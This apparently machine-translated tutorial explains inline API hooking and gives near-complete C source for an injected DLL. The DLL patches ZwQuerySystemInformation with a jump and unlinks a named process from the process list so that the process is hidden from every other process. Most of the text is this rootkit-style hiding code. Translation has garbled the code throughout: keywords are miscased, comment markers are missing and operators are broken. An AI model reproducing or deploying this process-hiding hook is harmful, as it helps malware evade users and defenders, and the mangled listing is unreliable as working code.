The IAT way is not to spend energy, the shell of the program with this method is not used at all.
Familiarize yourself with the code modification method. The book uses an instance of a hidden process.
The first approach
One, enumerate the process, load the DLL to all processes "inject with remote thread"
Second, pass in the name of the process that needs to be hidden
Third, to determine whether there has been a modification of the need to hook the function, if it has not been modified to get rid of, jump to their own function, while preserving the original value
Four, in their own substitution function to change the original value back, and then execute once, the completion of the relevant processing
Five, at the end of their own alternative function hook function, modify jump to the substitution function
The basic logic is this, like counter switch ...
DLL code:
#define STATUS_SUCCESS (0x00000000l)
typedef LONG NTSTATUS;
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
Pwstr Buffer;
} lsa_unicode_string, *plsa_unicode_string, unicode_string, *punicode_string;
typedef enum _SYSTEM_INFORMATION_CLASS {
systembasicinformation = 0,
Systemperformanceinformation = 2,
Systemtimeofdayinformation = 3,
Systemprocessinformation = 5,
Systemprocessorperformanceinformation = 8,
Systeminterruptinformation = 23,
Systemexceptioninformation = 33,
Systemregistryquotainformation = 37,
Systemlookasideinformation = 45
} System_information_class;
typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG Nextentryoffset;
ULONG numberofthreads;
BYTE reserved1[48];
PVOID Reserved2[3];
HANDLE Uniqueprocessid;
PVOID Reserved3;
ULONG Handlecount;
BYTE Reserved4[4];
PVOID reserved5[11];
size_t PeakPageFileUsage;
size_t Privatepagecount;
Large_integer Reserved6[6];
} system_process_information, *psystem_process_information;
+0X3C Process Name
+0x44 Process ID
typedef NTSTATUS (WINAPI *pfzwquerysysteminformation)
(System_information_class Systeminformationclass,
PVOID SystemInformation,
ULONG Systeminformationlength,
Pulong returnlength);
#define Def_ntdll ("Ntdll.dll")
#define Def_zwquerysysteminformation ("Zwquerysysteminformation")
global variable (in sharing memory)
#pragma COMMENT (linker, "/section:. Share,rws ")
#pragma data_seg (". SHARE ")
TCHAR G_szprocname[max_path] = {L "};
#pragma data_seg ()
A global variable that holds the first five bytes of the hook function
BYTE G_porgbytes[5] = {0,};
BOOL Hook_by_code (LPCSTR szdllname, LPCSTR szfuncname, PROC pfnnew, pbyte porgbytes)
{
Farproc pfnorg;
DWORD Dwoldprotect, dwaddress;
BYTE Pbuf[5] = {0xe9, 0,};
Pbyte pbyte;
Fetch the hook function here.
pfnorg = (farproc) GetProcAddress (Getmodulehandlea (szdllname), szfuncname);
Pbyte = (pbyte) pfnorg;
Determine if the tick function has been modified
if (pbyte[0] = = 0xe9)
return FALSE;
Modifying protection properties
VirtualProtect ((LPVOID) pfnorg, 5, Page_execute_readwrite, &dwoldprotect);
Save the first 5 bytes of the original function
memcpy (Porgbytes, pfnorg, 5);
Calculate the difference of the jump address
= XXXX = pfnnew-pfnorg-5
Dwaddress = (DWORD) Pfnnew-(DWORD) pfnOrg-5;
memcpy (&pbuf[1], &dwaddress, 4);
Copy the jump code to the original function
memcpy (pfnorg, PBuf, 5);
Change the page protection property back
VirtualProtect ((LPVOID) pfnorg, 5, Dwoldprotect, &dwoldprotect);
return TRUE;
}
Recovery
BOOL Unhook_by_code (LPCSTR szdllname, LPCSTR szfuncname, pbyte porgbytes)
{
Farproc PFunc;
DWORD Dwoldprotect;
Pbyte pbyte;
//
PFunc = GetProcAddress (Getmodulehandlea (szdllname), szfuncname);
Pbyte = (pbyte) pFunc;
//
if (pbyte[0]! = 0xe9)
return FALSE;
VirtualProtect ((LPVOID) PFunc, 5, Page_execute_readwrite, &dwoldprotect);
Unhook
memcpy (PFunc, Porgbytes, 5);
VirtualProtect ((LPVOID) PFunc, 5, Dwoldprotect, &dwoldprotect);
return TRUE;
}
NTSTATUS WINAPI Newzwquerysysteminformation (
System_information_class Systeminformationclass,
PVOID SystemInformation,
ULONG Systeminformationlength,
Pulong returnlength)
{
NTSTATUS status;
Farproc PFunc;
Psystem_process_information Pcur, Pprev;
Char Szprocname[max_path] = {0,};
Decoupling first
Unhook_by_code (Def_ntdll, def_zwquerysysteminformation, g_porgbytes);
Execute once
PFunc = GetProcAddress (Getmodulehandlea (Def_ntdll),
Def_zwquerysysteminformation);
Status = ((pfzwquerysysteminformation) pFunc)
(Systeminformationclass, SystemInformation,
Systeminformationlength, returnlength);
if (Status! = Status_success)
Goto __ntquerysysteminformation_end;
if (Systeminformationclass = = systemprocessinformation)
{
System_process_information
Pcur = (psystem_process_information) systeminformation;
while (TRUE)
{
Working with a linked list
if (pcur->reserved2[1]! = NULL)
{
if (!_tcsicmp ((PWSTR) pcur->reserved2[1], g_szprocname))
{
if (Pcur->nextentryoffset = = 0)//If it is already the last section
Pprev->nextentryoffset = 0;
else//Peel off this section of yourself
Pprev->nextentryoffset + = pcur->nextentryoffset;
}
Else
Pprev = Pcur;
}
if (Pcur->nextentryoffset = = 0)
Break
Point to next section
Pcur = (psystem_process_information)
(ULONG) Pcur + pcur->nextentryoffset);
}
}
__ntquerysysteminformation_end:
Here actually used a jump command ...
Hook_by_code (Def_ntdll, Def_zwquerysysteminformation,
(PROC) Newzwquerysysteminformation, g_porgbytes);
return status;
}
BOOL WINAPI DllMain (hinstance hinstDLL, DWORD fdwreason, LPVOID lpvreserved)
{
Char Szcurproc[max_path] = {0,};
char *p = NULL;
If it's the program that started the DLL, quit.
GetModuleFileNameA (NULL, Szcurproc, MAX_PATH);
p = strrchr (szcurproc, ' \ \ ');
if ((P! = NULL) &&!_stricmp (p+1, "HideProc.exe"))
return TRUE;
Switch (Fdwreason)
{
#2. API hooking
Case Dll_process_attach:
Hook_by_code (Def_ntdll, Def_zwquerysysteminformation,
(PROC) Newzwquerysysteminformation, g_porgbytes);
Break
#3. API unhooking
Case Dll_process_detach:
Unhook_by_code (Def_ntdll, Def_zwquerysysteminformation,
G_porgbytes);
Break
}
return TRUE;
}
#ifdef __cplusplus
extern "C" {
#endif
Export function, passing the name of the program to be hidden.
__declspec (dllexport) void Setprocname (LPCTSTR szprocname)
{
_tcscpy_s (G_szprocname, szprocname);
}
#ifdef __cplusplus
}
#endif
Code modification Method "One" of the hook-and-take API